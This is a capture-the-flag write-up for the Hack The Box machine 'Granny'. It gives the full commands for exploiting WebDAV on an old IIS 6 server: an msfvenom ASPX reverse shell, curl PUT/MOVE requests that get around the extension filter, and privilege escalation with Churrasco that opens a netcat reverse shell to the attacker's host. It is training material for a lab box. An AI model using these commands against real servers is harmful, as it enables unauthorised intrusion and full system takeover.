
HTB: Granny
A Windows Server 2003 box running IIS 6 with WebDAV write methods left enabled. The upload filter checks the extension rather than the file, so you upload as text and rename it into something the server will execute, then take SYSTEM with a token impersonation tool from the same era.
Looking at our nmap scan we can see there is an app on port 80, so let's go check this out.

It's a page under construction. Looking back at the nmap scan we can see we have a lot of methods and public options going on here.

This is WebDAV, and the scan is telling us the write methods are enabled. That's the whole box right there: if the server lets us PUT a file and MOVE it afterwards, we can put something on disk and then rename it into something the server will execute. Let's run davtest and see exactly what we can do.
davtest -url http://10.129.95.234

We can upload text files, and crucially we can also rename a file by moving it. Note that uploading an aspx directly fails. The filter is on the extension at upload time, not on what the file is, so we upload as something allowed and rename afterwards.
Let's create our reverse shell with msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.211 LPORT=443 -f aspx -o shell.txt
Now we upload the file with PUT.
curl -X PUT http://10.129.95.234/shell.txt --data-binary @shell.txt
Then we MOVE it to rename it into something IIS will run.
curl -X MOVE -H 'Destination: http://10.129.95.234/shell.aspx' http://10.129.95.234/shell.txt
Now we start our listener and hit the shell.
nc -lnvp 443

We're in. Let's check our privileges.
whoami /priv

We have the impersonate privilege, which is the usual route off a service account. Let's check what we're actually running on.
systeminfo

Confirmed, this is an old Windows Server 2003, so we have a few options. The modern potato tools all target far newer builds, so for this vintage the right tool is Churrasco, which abuses token impersonation on 2003 specifically.
The Churrasco binary on GitHub
We download it and upload it the same way as before, as a text file and then moved into place. We also need netcat on the box, brought over the same way.
curl -X PUT http://10.129.95.234/churrasco.txt --data-binary @churrasco.exe
curl -X MOVE -H 'Destination: http://10.129.95.234/churrasco.exe' http://10.129.95.234/churrasco.txt
curl -X PUT http://10.129.95.234/nc.txt --data-binary @nc.exe
curl -X MOVE -H 'Destination: http://10.129.95.234/nc.exe' http://10.129.95.234/nc.txt
Then from the shell we run it, pointing it at a second listener.
churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 10.10.14.211 4444"

It worked. Let's confirm what we have on the new connection.
nc -lnvp 4444
whoami /priv

Full privileges. Let's grab those flags. We head over to the Lakis desktop for the user flag.
type user.txt

Now we head over to the Administrator desktop and grab the root flag.
type root.txt

This box was pretty easy and not practical. Honestly this is something that won't be seen in the wild unless it's a granny still running a Windows 2003 server. Cool fun box though.
